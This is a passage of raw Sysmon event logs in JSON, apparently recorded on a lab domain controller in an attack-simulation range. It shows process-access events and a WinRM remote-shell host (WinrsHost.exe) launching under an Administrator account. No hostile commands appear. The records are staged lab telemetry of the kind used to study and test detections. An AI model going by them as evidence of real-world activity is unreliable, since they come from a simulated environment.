ime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2410,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2411,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2412,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2413,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.734\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010C2530400}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.734","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010C2530400}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2414,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.750\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-0010C2530400}\r\nSourceProcessId: 3320\r\nSourceThreadId: 3340\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001018530400}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.750","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-0010C2530400}","SourceProcessId":"3320","SourceThreadId":"3340","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001018530400}","TargetProcessId":"3384","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2415,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001018530400}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001018530400}","TargetProcessId":"3384","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2416,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.772\r\nProcessGuid: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nProcessId: 4104\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DA-5F25-0000-002027420400}\r\nLogonId: 0x44227\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.772","ProcessGuid":"{A837DB8D-01DD-5F25-0000-00102C560400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DA-5F25-0000-002027420400}","LogonId":"0x44227","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2417,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2418,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2419,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 